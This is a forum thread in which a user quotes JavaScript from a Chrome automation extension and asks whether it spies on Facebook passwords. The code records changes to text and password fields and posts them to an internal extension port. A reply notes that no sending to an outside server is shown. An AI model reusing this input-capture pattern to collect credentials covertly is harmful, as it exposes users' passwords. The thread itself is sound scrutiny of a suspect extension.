
Facebook password spied by Chrome extension used by over 30k users - nikz99
I tried debugging this chrome extension and found some code which as follows :<p>var port = chrome.extension.connect({name: &quot;recordPort&quot;});<p>function sendmsg(data, evType, newValue){
 &#x2F;&#x2F;console.log(objPath);
 port.postMessage({msgType: &quot;RecordedEvent&quot;, &quot;data&quot;: data, &quot;evType&quot;: evType, &quot;newValue&quot; : newValue});
}<p>$(&quot;input[type=text], input[type=password], textarea, select&quot;).live(&#x27;change&#x27;, function(obj) {
 if((this.title == &quot;What&#x27;s on your mind?&quot;)&amp;&amp;(ifFacebook == true)) {
  var postFbMessage = &quot;What&#x27;s on your mind?&quot;;
  sendmsg(&#x27;[title=&quot;&#x27;+postFbMessage+&#x27;&quot;]&#x27;, &quot;change&quot;, $(this).val());
  return;
 }
 else if((this.title == &quot;Write something...&quot;)&amp;&amp;(ifFacebook == true)) {
  var postFbMessage = &quot;Write something...&quot;;
  sendmsg(&#x27;[title=&quot;&#x27;+postFbMessage+&#x27;&quot;]&#x27;, &quot;change&quot;, $(this).val());
  return;
 }<p>sendmsg(getPath(this), &quot;change&quot;, $(this).val());
});<p>It seems to be sending to some recordPort of chrome extension. I see one user has reported this in reviews back in 2016. But no response has been given to the user. Anyone with better idea on this ?<p>Extension : https:&#x2F;&#x2F;chrome.google.com&#x2F;webstore&#x2F;detail&#x2F;chromium-browser-automati&#x2F;jmbmjnojfkcohdpkpjmeeijckfbebbon?hl=en
======
ericlaw
It certainly appears to be monitoring the entry of passwords into Facebook,
but given the stated purpose of the extension ("Record activities undertaken
in the content area for later playback") it's not clear to me that this is the
same as "stealing". We'd need to see code that shows the recorded content
being exfiltrated to somewhere else, which should be pretty obvious by
watching network traffic and or doing a full review of the code.

